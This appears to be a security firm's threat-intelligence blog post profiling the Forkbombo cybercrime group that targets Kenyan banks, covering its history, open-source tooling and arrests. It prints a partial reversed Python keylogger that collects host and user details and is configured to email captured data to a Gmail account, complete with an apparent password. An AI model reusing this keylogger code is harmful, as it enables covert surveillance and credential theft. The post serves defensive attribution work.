Understanding the Adversaries : The Forkbombo group.

The Forkbombo code-name of this threat actor was derived from a toolkit they used back in 2016-2017 to send keylogger data after infecting an institution. The email was forkbombo@gmail.com

This is a homegrown cyber threat actor that has been active since 2015 and has grown to a huge cartel made up of Money Launderers, Hackers, Coders, Operators and Insiders. This adversary represents constant threat to a wide variety of institutions mostly being the Banking sector around Kenya and its neighboring countries.

This threat actor is known to specialize in python scripts to create quick tools for exploitation phase of an environment. They are also known to use opensource tools like Empire, Metasploit, DeathStar, Bloodhound, CrackMapExec, Aesshell, XmultiShell, CHAOS, Katoolin etc.

Their initial keylogger was written by a student who later became a bigger player of the group and he registered forkbombo@gmail.com in 2016 to be used as mail receiver of the keylogger data as below:

import pythoncom, pyHook, sys, logging, socket, datetime, os, win32gui,time
import smtplib
from email.MIMEMultipart import MIMEMultipart
from email.MIMEBase import MIMEBase
from email.MIMEText import MIMEText
from email import Encoders
global MAIL_SENT
MAIL_SENT=False
gmail_user = “forkbombo@gmail.com”
gmail_pwd = “mlimani_25891011”
LOG_NEWACTIVE=”
LOG_ACTIVE=”
LOG_TEXT=”
now = datetime.datetime.now()
COMPUTER_NAME= socket.gethostname()+” “+ socket.gethostbyname(socket.gethostname()) + “: “
LOGGED_IN=os.getenv(‘USERNAME’)
PATH_FILE=os.getenv(‘UserProfile’)
FILE_NAME=str(PATH_FILE)+”\”+LOGGED_IN+’.tar.gz’

This email was used in a lot of money heists around the Nairobi before they changed to rodnetmark@gmail.com and later agentrodnet@gmail.com for further attacks. Whenever the keylogger generated its data, a file with extension .tar.gz was saved at the usernames userprofile with the username as the name of the file. When we responded to institutions with Forkbombo malware infestation we would find servers and workstations full of these text files that had that extension.

A reversed keylogger snapshot of the old Forkbombo’s logger that sent data to a Gmail account.

In 2017, several key leaders of Forkbombo group were arrested in a Safehouse they used in Yaya center with several hackers disappearing into the woods and splitting into two groups.

OnNet team do pursue them and has code-named these threat actors as SilentCards and GrapZone for attribution. In 2018, Grapzone members including money mules joined back together and new bigger Forkbombo group was made.

In the coming months, OnNet team will share with you more deeper CTI on these groups, why they are currently at a dispute and opposing sides.

OnNet pays special attention to these intruders and is currently pursuing other Advanced Financial Threats that are targeting our customers.